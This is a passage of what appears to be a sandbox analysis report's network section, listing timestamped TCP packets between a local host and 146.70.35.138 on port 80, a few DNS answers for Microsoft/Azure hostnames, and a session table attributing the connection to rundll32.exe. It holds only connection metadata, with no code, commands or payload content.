Apr 22, 2022 15:27:19.215744019 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.215764999 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.215780020 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.215786934 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.215796947 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.215806961 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.215841055 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.215872049 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.215897083 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.215914011 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.215917110 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.215939045 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.215944052 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.215964079 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.215981007 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.215981960 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.216005087 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.216054916 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.216079950 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.216097116 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.216104984 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.216120958 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.216212034 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.216258049 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.256669044 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.256676912 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.256680965 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.256704092 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.256732941 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.256750107 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.256772995 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.256777048 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.256799936 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.256814957 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.256840944 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.256870985 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.256875038 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.256937981 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.257031918 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.257055998 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.257072926 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.257090092 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.257093906 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.257122993 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.257147074 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.257152081 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.257169008 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.257198095 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.257216930 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.257257938 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.257265091 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.257278919 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.257306099 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.257328033 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.257389069 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.298845053 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.298898935 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.298918009 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.298940897 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.298947096 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.298965931 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.298976898 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.298981905 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.299001932 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.299022913 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.299027920 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.299045086 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.299098015 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.299114943 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.299139023 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.299154997 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.299166918 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.299206972 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.299283981 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.299309015 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.299324989 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.299335003 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.299357891 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.299360037 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.299401045 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.299406052 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.299417973 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.299434900 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.299443007 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.299480915 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.299699068 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.299734116 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.299751043 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.299767971 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.299803019 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.299882889 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.299901962 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.299933910 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.299954891 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.340186119 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.340233088 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.340250969 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.340270996 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.340282917 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.340292931 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.340308905 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.340329885 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.340368032 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.340404034 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.340426922 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.340442896 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.340454102 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.340461016 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.340475082 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.340502024 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.340759039 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.340795040 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.340821981 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.340852976 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.340874910 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.340910912 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.340935946 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.340951920 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.340964079 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.340986013 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.341007948 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.341016054 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.341036081 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.341064930 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.341125011 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.341173887 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.341259956 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.341293097 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.341310024 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.341327906 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class |
---|---|---|---|---|---|---|---|---|---|
Apr 22, 2022 15:26:57.316037893 CEST | 8.8.8.8 | 192.168.2.7 | 0x9880 | No error (0) | | | 13.107.43.16 | A (IP address) | IN (0x0001) |
Apr 22, 2022 15:26:57.330679893 CEST | 8.8.8.8 | 192.168.2.7 | 0x6bd2 | No error (0) | | a-0019.a.dns.azurefd.net | | CNAME (Canonical name) | IN (0x0001) |
Apr 22, 2022 15:26:57.330679893 CEST | 8.8.8.8 | 192.168.2.7 | 0x6bd2 | No error (0) | | a-0019.standard.a-msedge.net | | CNAME (Canonical name) | IN (0x0001) |
Apr 22, 2022 15:26:57.330679893 CEST | 8.8.8.8 | 192.168.2.7 | 0x6bd2 | No error (0) | | | 204.79.197.222 | A (IP address) | IN (0x0001) |

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
0 | 192.168.2.7 | 49775 | 146.70.35.138 | 80 | C:\Windows\SysWOW64\rundll32.exe |

Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Apr 22, 2022 15:27:17.806870937 CEST | 1052 | OUT | |
Apr 22, 2022 15:27:18.182925940 CEST | 1053 | IN | |